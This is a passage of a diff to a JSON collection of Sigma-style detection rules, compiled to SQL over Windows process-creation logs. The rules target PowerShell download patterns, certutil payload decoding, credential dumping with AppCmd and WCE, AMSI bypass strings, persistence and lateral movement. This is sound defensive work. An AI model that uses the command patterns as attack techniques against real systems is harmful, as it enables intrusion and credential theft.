'%http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'CALC.EXE', 'MSHTA.EXE', 'cscript.exe', 'wscript.exe', 'REGSVR32.EXE', 'installutil.exe', 'CMSTP.EXE')) AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\') OR (CurrentDirectory = '') OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_bitsadmin_download.yml" + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Use Short Name Path in Command Line", + "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "status": "experimental", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Administrative scripts" + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((NewProcessName LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "title": "File Decoded From Base64/Hex Via Certutil.EXE", + "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_certutil_decode.yml" + }, + { + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "falsepositives": [ + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", - "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "New Network Trace Capture Started Via Netsh.EXE", - "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", - "status": "test", - "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", - "author": "Kutepov Anton, oscd.community", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "status": "experimental", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_packet_capture.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Microsoft Compatibility Appraiser", + "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "status": "experimental", + "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "PowerShell Download Pattern", - "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "status": "test", - "description": "Detects a Powershell process that contains download commands in its command line string", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Use of UltraVNC Remote Access Software", + "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" ], - "filename": "proc_creation_win_powershell_download_patterns.yml" + "filename": "proc_creation_win_ultravnc.yml" }, { - "title": "Suspicious Execution of InstallUtil Without Log", - "id": "d042284c-a296-4988-9be5-f424fadcc28c", - "status": "test", - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", - "author": "frack113", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND NewProcessName LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_instalutil_no_log_execution.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Use of UltraVNC Remote Access Software", - "id": "145322e4-0fd3-486b-81ca-9addc75736d8", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "author": "frack113", + "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", + "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "status": "test", + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate use" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ultravnc.yml" + "filename": "proc_creation_win_reg_add_run_key.yml" }, { - "title": "Automated Collection Command Prompt", - "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_automated_collection.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "Use of TTDInject.exe", - "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", - "status": "experimental", - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "author": "frack113", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ttdinject.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Sdclt Child Processes", - "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", "status": "test", - "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdclt_child_process.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary DLL Load Using Winword", + "id": "f7375e28-5c14-432f-b8d1-1db26c832df3", + "status": "test", + "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", + "author": "Victor Sergeev, oscd.community", "tags": [ 